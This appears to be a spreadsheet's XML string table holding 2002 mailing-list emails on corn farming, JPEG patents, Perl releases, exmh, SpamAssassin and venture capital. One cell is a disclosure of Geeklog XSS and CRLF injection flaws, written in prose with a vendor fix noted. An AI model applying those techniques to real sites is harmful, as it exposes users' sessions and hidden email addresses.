beef is higher in saturated fats than grass-fed beef.We know a lot more about what 80 million acres of corn is doing to the
health of our environment: serious and lasting damage. Modern corn
hybrids are the greediest of plants, demanding more nitrogen fertilizer
than any other crop. Corn requires more pesticide than any other food
crop. Runoff from these chemicals finds its way into the groundwater
and, in the Midwestern corn belt, into the Mississippi River, which
carries it to the Gulf of Mexico, where it has already killed off marine
life in a 12,000 square mile area.To produce the chemicals we apply to our cornfields takes vast amounts
of oil and natural gas. (Nitrogen fertilizer is made from natural gas,
pesticides from oil.) America's corn crop might look like a sustainable,
solar-powered system for producing food, but it is actually a huge,
inefficient, polluting machine that guzzles fossil fuel -- a half a
gallon of it for every bushel.So it seems corn has indeed become king. We have given it more of our
land than any other plant, an area more than twice the size of New York
State. To keep it well fed and safe from predators we douse it with
chemicals that poison our water and deepen our dependence on foreign
oil. And then in order to dispose of all the corn this cracked system
has produced, we eat it as fast as we can in as many ways as we can
turning the fat of the land into, well, fat. One has to wonder whether
corn hasn't at last succeeded in domesticating us.
======
Michael Pollan is the author, most recently, of "The Botany of Desire: A
Plant's-Eye View of the World."
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 _   _ _____ _  __ &lt;*the* weekly high-tech sarcastic update for the uk&gt;
| \ | |_   _| |/ / _ __   __2002-07-19_ o join! mail an empty message to
|  \| | | | | ' / | '_ \ / _ \ \ /\ / / o ntknow-subscribe@lists.ntk.net
| |\  | | | | . \ | | | | (_) \ v  v /  o website (+ archive) lives at:
|_| \_| |_| |_|\_\|_| |_|\___/ \_/\_/   o     http://www.ntk.net/
        "Until we secure our cyber infrastructure, a few keystrokes and
         an Internet connection is all one needs to disable the economy
         and endanger lives..."
                                              - Lamar Smith, US Senator
                             http://www.msnbc.com/news/780923.asp?cp1=1         &gt; DISABLE ECONOMY
         &gt; You cannot do that here.
         &gt; EXAMINE CYBER INFRASTRUCTURE
         &gt; Access Denied.
         &gt; HIT ECONOMY WITH STICK
                                                 &gt;&gt; HARD NEWS &lt;&lt;
                               life-long pursuits         On July 17th, 2001, DMITRY SKLYAROV, coder for the Russian
         software house ELCOMSOFT, was arrested while visiting the
         US. His crime: writing code that exposed flaws in Adobe's
         e-book security, in contravention of the USA's exciting new
         DMCA. In the next year, thanks to widespread protests, Adobe
         withdrew their call to prosecute the Russian hacker and
         Dmitry was freed. Elcomsoft is still in the dock for
         breaching Adobe's copy restriction routines. If the aim of
         the prosecution was to cow them into keeping quiet about
         security problems, it doesn't appear to have worked. On July
         12th, 2002, ELCOMSOFT posted to Bugtraq a flaw in Adobe's
         e-book security. Namely, that in Adobe's "lending library"
         web app for the Adobe Content Server, you can borrow a book
         for over twenty years (instead of three days) just by
         changing a hidden Web form value. The library site is just a
         demonstration app, so it's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http://lists.insecure.org/bugtraq/2002/Jul/0133.html
                           - don't plan any trips to Disneyland, Vlad
         http://librarydemo.adobe.com/library/
                          - fixed, it looks, by stubbing out the code
         http://lists.insecure.org/bugtraq/2002/Jul/0193.html
- now, for real chutzpah, post a Symantec exploit on the newly 0wn3d BugTraq         We'll tread cautiously with this one, as it involves Vast
         Ageless Corporations Who Have Retained Counsel Living Where
         Their Glowing Eyesockets Used To Be. Just days before we
         read on Slashdot that zombie company FORGENT is demanding
         patent license fees for users of JPEG, we're contacted by
         someone who has received a similiarly threatening letter -
         this time, from the rather more established Lucent
         Technologies. The message reads: "After some market research
         it has come to our attention that some of your company's
         products may employ the JBIG/JPEG Standard. Therefore,
         Lucent Technologies GRL LLC, Lucent's licensing agent, is
         contacting your company regarding your interest in obtaining
         a license for patents." What follows is the usual demand for
         fees, dire threats if compliance is thwarted, requests that
         the guards seize the criminals and throw them in Patent
         Dungeon, etc. Now, Lucent's patents don't seem to be
         breached by a JPEG implementaton (although it's known that
         JBIG is patent-encumbered; hence JBIG-2). So why does Lucent
         bring up JPEG at all? A curious wording for sure, and we'd
         be interested to see if anyone else has been contacted in
         these terms. Mail us at tips@spesh.com if you have.
         http://slashdot.org/article.pl?sid=02/07/18/157217
       - best use of porn collection in slashdot post modded funny +5
http://www.ghostscript.com/pipermail/gs-devel/2002-February/001203.html
                                          - JBIG encumbered, JBIG2 no         Oh, is it time again already for Esquire's 50 Sharpest Men
         2002? Joy! Hidden among the usual suspects - which include
         Richard Dawkins ("scientist"), Kevin Warwick ("scientist"),
         Kevin Eldon ("comedian" - and KING OF HOBBIES), is one 
         Charlie Brooker (listed here as a "TV Go Home"). Merely 
         appearing in the list seems to have prompted the reclusive,
         unsmiling, and often violent comedian to hurredly post a 
         TVGoHome update from his pile of cardboard boxes near Soho,
         which is all to the good. But does he really deserve the title?
         What *is* sharpness? "In case your are [sic] in any doubt", 
         the site explains, "sharpness is, above all, an attitude". Now
         the dictionary says it's also "having a bitter taste", and
         "harshness of manner", and given that Hank, the Angry
         Drunken Dwarf is both unlisted and dead, we think Brooker's
         a show-in for the Web protest/mess-with-publisher's-heads
         vote. We urge you to vote now, express the will of the
         people, and win some vile perfume or a horrible watch.
         http://www.esquire.co.uk/esquire50.htm
           - warning: torturous and unnecessarilly prolonged web form
         http://www.thebee.com/bweb/iinfo106.htm
- Hank: another exciting Net meme you missed because you go out too much
                                &gt;&gt; ANTI-NEWS &lt;&lt;
                             berating the obvious         when oh when will the public tire of PUERILE GOOGLE TYPOS?: 
         http://www.google.com/search?q=overcocking , "addtition", 
         "t-shits", "eductation", and (via prudish spellcheckers?): 
         http://www.google.com/search?q=%22public+lice%22 ... don't buy: 
     http://www.ebuyer.com/customer/products/index.html?product_uid=26497
         ... bringing a whole new meaning to "colour naming systems": 
         http://www.ntk.net/2002/07/19/dohhue.gif ... might explain its 
         bewildered state: http://www.ntk.net/2002/07/19/dohpot.gif ... 
         http://www.contactnet.ro/solutiixxi/index.php?lim=e vs "On our 
         children's game-place, they can romp after hug-desire!!": 
         http://www.tourismus-tirol.com/scharnitz/risserhof/indexe.html 
         ... self-fulfilling: http://www.ntk.net/2002/07/19/dohdig.gif 
         ... and when VIM met the PALM platform, the "Related E-Books" 
         were MOIDER: http://www.ntk.net/2002/07/19/dohvim.gif ... 
                               &gt;&gt; EVENT QUEUE &lt;&lt;
                         goto's considered non-harmful         Yes, we have concerns about encountering Slashdot readers "au 
         naturel" without any kind of intervening moderation system. 
         And yet, at the same time, we cannot look away. 7pm local 
         time, Thu 2002-07-25 marks the world's first SLASHDOT MEETUP 
         EVENT (check local listings for details, free), attracting - 
         at time of writing - an impressive 91 interested signups for 
         the London gathering (19 for Manchester, Leeds 17, Glasgow 11, 
         Birmingham 9, Liverpool 6, and so on). Usual warnings about 
         meeting your online "friends" are, we imagine, more than 
         usually applicable here - especially as no-one can work out 
         what the organisers are getting out of it. Spamming lists? 
         Kickbacks from the democratically selected venues? Or valuable 
         demographic info like the fact that "Elijah Wood" is currently 
         more popular in hobbit-friendly Glasgow than U2, Tori Amos, or 
         Duran Duran? 
         http://slashdot.meetup.com/
                                  - #goth girls for bearded sysadmins
         http://www.defcon.org/
                            - plus Defcon in Vegas in two weeks' time
                                &gt;&gt; TRACKING &lt;&lt;
               sufficiently advanced technology : the gathering         Once again that silly 5K Web competition thing gets the
         headlines. And once again, we must rub its fatty, fatty chin
         against the honed shard of flint that is the 2002 1K
         MINIGAME 8-BIT CODING COMPETITION until it's shaved meek.
         1024 bytes is all you (must have) wrote: to enter, arrange
         them to form a working game on any 8-bit micro you choose.
         In response to complaints from last year, "middle class BBC
         Micro Fauntleroys" will be permitted, says last year's
         judge, Matt Westcott. More weakness is shown by permitting
         Atari 2600s, which have 2K cartridges, to enter (you must
         fill the last 1K with zeros), and also the TI99/4A which as
         everyone knows has sixteen bits. We do hope this doesn't end
         in Zork virtual machines or Postscript or something.
         http://www.ffd2.com/minigame/
                   - "The competition will never be 'fair'" - BETTER!
         http://entries.the5k.org/946/wolf5k.html
                                                  - oh, the decadence
         http://www.igf.com/submit.htm
- $20,000 prize money; probably not accepting Oric Forth games this year
                                &gt;&gt; MEMEPOOL &lt;&lt;
                ceci n'est pas une http://www.gagpipe.com/         "Now That's What I Call Copyright Infringement, Vols 1,2,3": 
         http://pod-135.dolphin-server.co.uk/~boom/thecd/boom.php ... 
         http://news.bbc.co.uk/hi/english/uk/2131236.stm - a case for: 
         http://news.bbc.co.uk/hi/english/uk/newsid_1490000/1490957.stm ?
         ... forget offshore accounting - what's to stop them going back 
         in time with the proceeds and killing all the investors' 
         grandfathers?: http://www.timetravelfund.com/ ... telnet 
         econet: http://www.heyrick.co.uk/econet/misc/tcpip.html ... 
         ... you know, wouldn't a simple 404 attract less attention?: 
         http://www.ttfn.com/ ... Transformers! Terrorists in disguise! 
         http://www.tsa.gov/workingwithtsa/aircraft_prohibit.shtm ... 
         obligatory filk Pie cover: http://home.mchsi.com/~jeffwadler/ 
         ... they laughed when I sat down at the VT100 terminal: 
         http://www.prodikeys.com/ ... and kept laughing, thanks to: 
         http://www.colorpilot.com/sound.html ...
                                &gt;&gt; GEEK MEDIA &lt;&lt;
                   what, *another* http://www.tvgohome.com/ ?         TV&gt;&gt; now that kids are taking over from teachers in RULE THE 
         SCHOOL (5pm, Fri, BBC1) and redecorating their homes in HOME 
         ON THEIR OWN (7pm, Sat, ITV), we can't wait for the concept 
         gameshows where they fly planes, run pubs and perform 
         lifesaving surgery... Wired UK's Hari Kunzru reappears on 
         NEWSNIGHT REVIEW (11pm, Fri, BBC2)... and if you like James 
         "Copland" Mangold's sensitive character study of an overweight 
         man HEAVY (1.05am, Fri, BBC2), the IMDB also recommends Eddie 
         Murphy's "The Nutty Professor"... The Beach Boys' "Pet Sounds" 
         is the subject of ART THAT SHOOK THE WORLD (7.20pm, Sat, 
         BBC2), even though it doesn't have "Good Vibrations" on it... 
         Meg Ryan experiments with setting a romantic comedy during the 
         Gulf War, and where one of the protagonists is dead, in 
         COURAGE UNDER FIRE (9.15pm, Sat, BBC1)... but we'd skip that - 
         along with laboured Tim Burton homage MARS ATTACKS! (10.35pm, 
         Sat, ITV) - in favour of Ensign Ro and Kevin Spacey - together 
         at last! - in top-notch low-budget office horror SWIMMING WITH 
         SHARKS (10.50pm, Sat, C5)... Radha "Pitch Black" Mitchell 
         shows up in Aussie relo-drama LOVE AND OTHER CATASTROPHES 
         (1.05am, Sat, BBC2)... Matt "Max Headroom" Frewer fails to 
         halt the downward slide of the "National Lampoon" franchise in 
         Washington excursion NATIONAL LAMPOON'S SENIOR TRIP (12.30am, 
         Sat, ITV), compared to acknowledged classics like NATIONAL 
         LAMPOON'S VACATION (9pm, Tue, C5)... the final of JUNKYARD 
         WARS (8pm, Mon, C4) offers a taste of where these shows are 
         going when the teams must build full-size remote-controlled 
         "combat cars"... while a "I Preferred The Terrorism Of The 
         1980s" special recreates the SAS - EMBASSY SIEGE (9pm, Thu, 
         BBC2) - if only everything was as simple as pseudo-'70s 
         supernatural action comedy GOOD VS EVIL (9pm, Wed, Sci-Fi)... 
         FILM&gt;&gt; David Cronenberg explains why the "Friday The 13th" 
         machete murderer is so hard to kill, shortly before he goes up 
         against two of the chicks from "Gene Roddenberry's Andromeda" 
         in undemanding self-referential "Alien"-alike JASON X 
         ( http://www.cndb.com/movie.html?title=Jason+X+%282001%29 : 
         [Lexa "Andromeda" Doig] [is] flat on her back on a table 
         recuperating, and the camera shows her boobs; [Lisa "Beka 
         Valentine"] Ryder plays a robot who wants to be more of a 
         woman [...] her nipples fall off for a little comic relief)... 
         while the director of "Candyman" and UK hacker classic "Smart 
         Money" digital-videos drug-fuelled Hollywood self-excoriation 
         IVANS XTC ( http://www.cndb.com/movie.html?title=ivans+xtc : 
         [Lisa Enos], who also wrote the screenplay and whose first 
         film this is, appears in a few full frontal scenes a little 
         more than a third of the way through)... otherwise it's star-
         packed CGI talking animal interspecies romance STUART LITTLE 2 
         (imdb: sequel/ anthropomorphic/ based-on-novel/ bird/ mouse/ 
         part-computer-animation/ soccer)... or odd-sounding Oirish 
         period frolic THE ABDUCTION CLUB ( http://www.bbfc.co.uk/ : 
         Cuts required to sight of 2 men hanging by necks in execution 
         scene, on grounds of potentially harmful imitable technique, 
         [in accordance with] category standards and Video Recordings 
         Act 1984)... 
         CONFECTIONERY THEORY&gt;&gt; as tastebuds acclimatise to the 
         acquired tang of DIET COKE LEMON, reader WAYNE WILLIAMS has 
         been forced to look further afield for his acidic thrills, 
         proclaiming the "Citrus" version of ROWNTREE'S FRUITSOME 
         CEREAL BARS "pretty tasty, a bit like a lemon meringue pie in 
         a bar". Frankly we preferred the "Tropical" and "Red Berry" 
         variants, though neither as much as the various ALPEN BARS 
         with "yoghurt" or "chocolate" style toppings - and all for 
         just twice the fat of ordinary breakfast cereal! In other 
         most-important-meal-of-the-day news, those eggy "breakfast 
         pizza" CHICAGO TOWN SCRAMBLES [NTK 2002-04-12] are delicious 
         (particularly with tomato ketchup), and have been flying off 
         the shelves in a 2-pack for 99p deal in selected branches of 
         Sainsbury's... as predicted in NTK 2001-08-10, KFC have taken 
         advantage of MCDONALD'S weakness in the KITKAT MCFLURRY arena, 
         and rolled out their identically-sized rival AVALANCHE (also 
         99p) with a freakish selection of toppings including chocolate 
         sauce, Cadbury's Flake, M&amp;M's and Starburst Joosters. In a 
         non-ice-cream-related incident, CHARLOTTE LATIMER was the 
         first to contact us with a sighting of STARBURST "straight-
         out-of-the-1993-naming-dept" FLIPSTERS HARD CANDY (from 
         30p/pack): "pretty nice hard candies (peach, apple, raspberry 
         and forest fruits) with a yucky plastic-looking splodge on one 
         side that purports to offer some kind of creaminess (we 
         guess)", but still no news yet of the brand's other mutant 
         offspring: teardrop-shaped FRUITINESSE (from 49p), non-fish-
         flavoured gummy SEA MONSTERS (from 99p/bag), and STARBURST 
         CAKE BARS (UKP1.05 for pack of 5)... and finally, MIKE WALSH 
         of Finland remained nonplussed with last month's UK sighting 
         of an imported South African NESTLE SMARTIES IN MILKYBAR 
         CHOCOLATE, maintaining he bought a White "Ritter Sport" bar 
         with Smarties in, "in a branch of the (German) Spar chain in 
         Tenerife in January", and was generally disappointed by its 
         usability: "Smarties kept falling out", he complains. But 
         Nestle is innovating over here as well, with the imminent 
         arrival of WONKA XPLODER and GOLDEN CRUNCHER biscuits (79p/ 
         pack of 6) - replacing underperforming former NTK "Taste 
         Abominations" WONKA OOMPA sweets - and its first new chocolate 
         launch in 5 years, solid-looking would-be Dairy Milk-killer 
         NESTLE DOUBLE CREAM (40p, available from July 29)...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'"funny"'
                         http://www.net-watch.org/1.htm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</si>
  <si>
    <t xml:space="preserve">Geeklog XSS and CRLF Injection
PROGRAM: Geeklog
VENDOR: Tony Bibbs et al. 
HOMEPAGE: http://geeklog.sourceforge.net/
VULNERABLE VERSIONS: 1.3.5sr1, possibly earlier versions as well
NOT VULNERABLE VERSIONS: 1.3.5sr2
LOGIN REQUIRED: no
SEVERITY: high
DESCRIPTION:"Geeklog is a 'blog', otherwise known as a Weblog. It allows
you to create your own virtual community area, complete with user
administration, story posting, messaging, comments, polls, calendar,
weblinks, and more! It can run on many different operating systems,
and uses PHP4 and MySQL."(direct quote from the program's homepage)Geeklog is published under the terms of the GNU General Public
License.
SECURITY HOLES:1) Geeklog has got an XSS hole that affects both the stories and
the comments. The program removes the HTML elements that are used
for scripting, but it fails to remove the HTML attributes that are
used for the same purpose, which leads to this hole.One example of an XSS attack would be:life
has made her that much bolder nowWhen a victim moves the mouse pointer over the quote from "Lady
Godiva's Operation", an intrinsic event occurs and the JavaScript
code is executed.(There is also an XSS issue in the search engine. It was reported
by Â§ome1, and not by me.)2) Geeklog has got a CRLF Injection hole in User Profile: Send
Email. The users' mail addresses are meant to be secret, but by
using this hole, you can get someone's mail address anyway.The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 the message will silently be copied to you, thus
revealing the recipient's mail address without them knowing.I have described this type of problem in further detail
in my "CRLF Injection" paper, which is available at
http://cert.uni-stuttgart.de/archive/bugtraq/2002/05/msg00079.html
COMMUNICATION WITH VENDOR:The vendor was contacted on the 1st of July. Version 1.3.5sr2,
which does not have any of these security holes (neither mine nor
Â§ome1's), was released on the 9th of July.
RECOMMENDATION:I recommend that all administrators upgrade to version 1.3.5sr2.
// Ulf Harnhammar
ulfh@update.uu.se
</t>
  </si>
  <si>
    <t xml:space="preserve">
"Christopher Crowley" said:&gt; That says that every line is prefixed with "SPAM: ". Could you
&gt; explain how to configure that in 10_misc.cf or in local.cf ?The problem with the "SPAM: " prefix, is that it's required for
spamassassin -d (removing SpamAssassin markup) to work correctly.--j.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</si>
  <si>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Friday, July 19, 2002, at 07:59 AM, Rodent of Unusual Size wrote:&gt; These days the
&gt; nation's nearly 80 million-acre field of corn rolls across the
&gt; countryside like a second great lawn, but this wholesome, all-American
&gt; image obscures a decidedly more dubious reality.And if you mention any of the health problems too loudly, the kids with 
glowing eyes take you away into the fields...http://www.angelfire.com/tn/cotcfanpage/----
Bill Humphries 
http://www.whump.com/moreLikeThis/http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">------------------------------------------------------------------------------
A video conferencing company based in Austin, Texas says it's going to
pursue royalties on the transmission of JPEG images.And it's already found a licensee: Sony Corporation.Formerly known as VTEL, Forgent Networks acquired Compression Labs in
1997, acquiring this patent into the bargain.  The patent claim was
filed in 1986 but Compression Labs never pursued royalties.[...]
------------------------------------------------------------------------------Rest at:
  http://www.theregister.co.uk/content/4/26272.htmlThe patent is at:
  http://patft.uspto.gov/netacgi/nph-Parser?Sect1=PTO1&amp;Sect2=HITOFF&amp;d=PALL&amp;p=1&amp;u=/netahtml/srchnum.htm&amp;r=1&amp;f=G&amp;l=50&amp;s1='4,698,672'.WKU.&amp;OS=PN/4,698,672&amp;RS=PN/4,698,672
Groan,
  Rob.
     .-.                                                               .-.
    /   \           .-.                                 .-.           /   \
   /     \         /   \       .-.     _     .-.       /   \         /     \
  /       \       /     \     /   \   / \   /   \     /     \       /       \
 /         \     /       \   /     `-'   `-'     \   /       \     /         \
            \   /         `-'                     `-'         \   /
             `-'                                               `-'
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
So are PNGs still kosh?http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 18 Jul 2002 13:00:29 +0200
Matthias Saou  wrote:&gt; Once upon a time, Matthias wrote :
&gt; &gt; ..see subject.
&gt; ..see valhalla.freshrpms.net ;-)Hi, Matthias,You should temporarly remove gentoo 0.11.29 from valhalla.freshrpms.net.
This build (and 0.11.28) has a strong bug: Problems with copying "deep"
directories.Have reported this to Emil, he looks currently into it, a fix should be
available soon..Sorry-- 
regards from Germany
                   Matthias
                   _______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t>billy@billyglynn.com has been successfully subscribed to Irish
Internet Users.</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 19 Jul 2002, Justin Mason mused:
&gt; Shane Williams said:
&gt;&gt; Also, if a single line of yelling scores -0.036, why not just round
&gt;&gt; it off to 0 and not have the test run at all?
&gt; 
&gt; good question ;)It seems reasonable to have a configurable minimum below which
spamassassin flattens the test to zero (turning it off): by default set
to zero; but if you set it to say 0.01, spamassassin would ignore tests
with scores -0.01&lt;0&lt;0.01 (trading accuracy for time).The overkill variant of this feature would have scores scored by (score
* relative-time-taken) with relative-time-taken computed over a large
corpus (probably Craig's ;} ). Then you could specify a minimum value of
*that* parameter to flatten at, giving assurances that you're killing
only tests that are expensive for their utility.Unfortunately I can't think of a good name for that parameter.I can whip up a patch if anyone thinks this is any use.-- 
`There's something satisfying about killing JWZ over and over again.'
                                        -- 1i, personal communication
</t>
  </si>
  <si>
    <t xml:space="preserve">At 11:30 AM -0700 7/19/02, William Pietri wrote:&gt;Laws occasionally are proposed; many are either clue-deficient or 
&gt;warped by special interests to be worse than no law at all. Others 
&gt;probably have more detailed information, but I look at the Spamcon 
&gt;site and at CAUCE for this sort of info.Specifically, we keep track of laws and cases at 
. Another source is 
.Cheers,
--          Tom Geller * tom@spamcon.org * +1-415-552-2557
Media Liaison/Secretary, SpamCon Foundation 
   Protecting email as a medium of communications and commerce
             A California non-profit organization
     Become a member: 
_______________________________________________
spamcon-tools mailing list
spamcon-tools@spamcon.org
http://mail.spamcon.org/mailman/listinfo/spamcon-tools
Subscribe, unsubscribe, etc: Send "help" in body of message to
    spamcon-tools-request@spamcon.org
Contact administrator: spamcon-tools-admin@spamcon.org
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline MailerLast Call for Papers for YAPC::Europe::2002
    posted by pudge on Friday July 19, @03:30 (yapce)
    http://use.perl.org/article.pl?sid=02/07/18/1430255Perl 5.8.0 Released
    posted by hfb on Friday July 19, @09:29 (releases)
    http://use.perl.org/article.pl?sid=02/07/19/038259Parrot 0.0.7 Released
    posted by pudge on Friday July 19, @13:40 (parrot)
    http://use.perl.org/article.pl?sid=02/07/19/1346238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</si>
  <si>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Last Call for Papers for YAPC::Europe::2002
    * Perl 5.8.0 Released
    * Parrot 0.0.7 Released+--------------------------------------------------------------------+
| Last Call for Papers for YAPC::Europe::2002                        |
|   posted by pudge on Friday July 19, @03:30 (yapce)                |
|   http://use.perl.org/article.pl?sid=02/07/18/1430255              |
+--------------------------------------------------------------------+[0]Richard Foley writes "Share your 'pe[a]rls of wisdom' with the Perl
community: attendees from all around the world, gurus and geeks alike,
will converge on Munich for [0]YAPC::Europe Sept. 18-20 to listen to the
talks and tutorials presented at this gathering of minds. This year's
theme is 'The Science of Perl', which means that we would really like to
hear about suggestions for talks, projects, experiences which involve
both perl and science. This should not be regarded as a restriction, more
as a 'nice to have' :-) Proposals may be submitted between January 1st
2002 and July 30th 2002."Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/07/18/1430255Links:
    0. http://www.yapc.org/Europe/
+--------------------------------------------------------------------+
| Perl 5.8.0 Released                                                |
|   posted by hfb on Friday July 19, @09:29 (releases)               |
|   http://use.perl.org/article.pl?sid=02/07/19/038259               |
+--------------------------------------------------------------------+[0]jhi writes "After more than two long years of hard work, the
perl5-porters is proud to announce Perl 5.8.0. The most important new
features are enhanced Unicode and threads support, and the new I/O
subsystem called PerlIO, but there are lots of new goodies, not to
mention bazillion bug fixes.The full [1]announcement is available, and you can read [2]what is new in
5.8.0, and if you like what you see, start [3]installing.Since this release has extensive support for non-Latin scripts, we also
translated the announcement to [4]Traditional Chinese (Big5-ETEN),
[5]Simplified Chinese (EUC-CN or GB2312), [6]Japanese (EUC-JP), and
[7]Korean (EUC-KR) (by Autrijus Tang, Dan Kogai, and Jungshik Shin).[8]ftp://ftp.cpan.org/pub/CPAN/src/perl-5.8.0.tar.gz is the main URL to
use, but of course any CPAN mirror will do once they catch up.Share and Enjoy!-- Jarkko Hietaniemi, on behalf of the Perl5 Porters"Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/07/19/038259Links:
    0. mailto:jhi@iki.fi
    1. http://dev.perl.org/perl5/news/2002/07/18/580ann/
    2. http://dev.perl.org/perl5/news/2002/07/18/580ann/perldelta.pod
    3. http://dev.perl.org/perl5/news/2002/07/18/580ann/INSTALL
    4. http://dev.perl.org/perl5/news/2002/07/18/580ann/p580ann.txt.big5-tw
    5. http://dev.perl.org/perl5/news/2002/07/18/580ann/p580ann.txt.euc-cn
    6. http://dev.perl.org/perl5/news/2002/07/18/580ann/p580ann.txt.euc-jp
    7. http://dev.perl.org/perl5/news/2002/07/18/580ann/p580ann.txt.euc-kr
    8. ftp://ftp.cpan.org/pub/CPAN/src/perl-5.8.0.tar.gz
+--------------------------------------------------------------------+
| Parrot 0.0.7 Released                                              |
|   posted by pudge on Friday July 19, @13:40 (parrot)               |
|   http://use.perl.org/article.pl?sid=02/07/19/1346238              |
+--------------------------------------------------------------------+[0]DrForr blesses us with version 0.0.7 of Parrot, including Perl 6
grammar and a small, but functional, compiler. Full announcement is
below.This story continues at:
    http://use.perl.org/article.pl?sid=02/07/19/1346238Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/07/19/1346238Links:
    0. mailto:jgoff@perl.orgCopyright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</si>
  <si>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 I poked
around a bit. glimpse.tcl uses Msg_Change, which has code in it to try and
deal with showing a message that isn't in the ftoc:
        Exmh_Status "Cannot find msg $msgid - Rescan?"
Is that message hiding in your log?  Perhaps there should be a return from
Msg_Change that glimpse.tcl can use to decide what to do next.&gt;&gt;&gt;Valdis.Kletnieks@vt.edu said:
 &gt; Scenario:
 &gt; 
 &gt; Inbox has a "dirty" ftoc, only the last 100 entries (3500-last or so).
 &gt; 
 &gt; Go to search... glimpse.   Glimpse finds a hit in inbox/3448 (which
 &gt; isn't
 &gt; in the ftoc).  Clicking on that one results in a find tool being
 &gt; launched
 &gt; *on the current item* (which of course misses, since the search string
 &gt; isn't IN that item - I wasn't even in 'inbox' at the time.  We don't
 &gt; change
 &gt; folders to inbox or display the message that got hit.
 &gt; 
 &gt; Clicking on another 'glimpse' hit that was an item that was in a
 &gt; non-dirty
 &gt; ftoc worked as expected - folder changed and that mail displayed, and
 &gt; the search tool found the hit.
 &gt; 
 &gt; /Valdis--
Brent Welch
Software Architect, Panasas Inc
Pioneering the World's Most Scalable and Agile Storage Network
www.panasas.com
welch@panasas.com_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">
Is there a relatively clean way to dynamically build comp files based on
the path of the current folder?  Yeah, I know exmh will pull the first comp in the path up from the
  current folder to the mail root, but that's not what I want.I'm starting to use plus addressing heavily as part of my SPAM controls.
Specifically I each mailing list with a list-specific address.  eg I would subscribe to this list as claw+exmh@kanga.nu or perhaps
  claw+exmh-users@kanga.nu instead of claw@kanga.nuHowever to do this I need a new set of comp files for each list folder.
As I'm subscribed to something just over 600 lists, that's rather a
pain.  I really don't want to go create and maintain ~1,800 comp files
(components, replcomps, replgroupcomps), especially not as I suspect
I'll be changing or adapting my naming pattern a few times as I adapt
various supporting tools.What would be great is if I could build the relevant comp file
dynamically at runtime.  That way I don't need to maintain a couple
thousand comp files, I just need to make my plus addresses
predictable/computable based (say) on the folder path.  eg I'm currently in folder:    +-Lists-/Products/Exmh-L    The script would dynamically build a compfile which had a From: of
    claw+exmh@kanga.nu for repl, comp, etc.  Similarly when in folder:    +-Lists-/Linux/SVLUG-L  I'd get a From: of claw+svlug@kanga.nuThat way I can use lookup tables for those folders which have multiple
lists being delivered into them.Any ideas how this might be done in an automatic/maintainable fashion?
It would be more than good enough if all I had to do was drop a tiny
FROM_HEADER file in each folder that somehow got picked up by the comp
file...--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</si>
  <si>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"Adam L. Beberg"  writes:&gt; &gt; VCs don't care about the success of the venture or the jobs of those
&gt; &gt; involved in it, they aren't "funding innovation" or stimulating growth
&gt; &gt; or fueling the economy.
&gt; 
&gt; Possibly replace "own" with "take from you ASAP with dilution". Their goal
&gt; is to take what you have by any means nessecary and sell it to someone else
&gt; for more then they paid within 7 years or less. That's what they do, nice
&gt; and simple. Your based-on-GPL-thing gives them no way to do that, so you are
&gt; irrelivant to the VC/investment world.Interestingly, it was the VC that convinced Zope Corp. to go opensource.-- 
Karl Anderson      kra@monkey.org           http://www.monkey.org/~kra/
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On 19 Jul 2002, Karl Anderson wrote:&gt; "Adam L. Beberg"  writes:
&gt;
&gt; &gt; Possibly replace "own" with "take from you ASAP with dilution". Their goal
&gt; &gt; is to take what you have by any means nessecary and sell it to someone else
&gt; &gt; for more then they paid within 7 years or less. That's what they do, nice
&gt; &gt; and simple. Your based-on-GPL-thing gives them no way to do that, so you are
&gt; &gt; irrelivant to the VC/investment world.
&gt;
&gt; Interestingly, it was the VC that convinced Zope Corp. to go opensource.But wasnt that before they realized that Open Source(TM) ment they couldnt
control it? There was a time when VC love was all over Open Source(TM) as a
revenue model.- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.comhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">"Adam L. Beberg"  writes:&gt; &gt; Interestingly, it was the VC that convinced Zope Corp. to go opensource.
&gt; 
&gt; But wasnt that before they realized that Open Source(TM) ment they couldnt
&gt; control it?If you're going to assume that they were stupid, why not assume that
they still are stupid, and never did realize it?-- 
Karl Anderson      kra@monkey.org           http://www.monkey.org/~kra/
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Chris said:
&gt; 
&gt; I can tell you what the 'clear' and 'del' arguments mean:
&gt; 
&gt; Mh_SequenceUpdate lists/l-k clear cur {} public
&gt; 	This means to clear the 'cur' sequence for lists/l-k
&gt; 
&gt; Mh_SequenceUpdate lists/l-k del unseen 5400 public
&gt; 	This means to delete message 5400 from the 'unseen' sequence for lists/l-k
&gt; 
&gt; Can you explain more what you were actually doing as this occurred?  This 
&gt; doesn't appear to be background processing.  Is there significance to message 
&gt; 5400?  Is it the one that isn't displaying?
&gt; 
&gt; ChrisAfter sending the report I started fiddling with the Ftoc_RescanLine 
stuff and I havn't seen it since. I can't really tell if it was my 
hacking that removed it, or if it was some transitional magic 
happening since this was the first invocation of that version of 
exmh. I've backed out my stuff now, and'll let you know if it happens 
again.
On another thing with the Ftoc_RescanLine stuff. This routine is 
called at times still unclar to me. An inspection of the routine 
suggests that it is used in the transition of a message to/form 
"current" state to re-paint the ftoc line. However, checking the 
msg.tcl code (MSgChange) we find:    if {$msgid != {}} {
        # Allow null msgid from Msg_ShowWhat, which supplies line 
instead
        if {$msgid &lt; 0}  return
    } else {
        # line null too, try using first in folder
        if {[string length $line] == 0} { set line 1 }
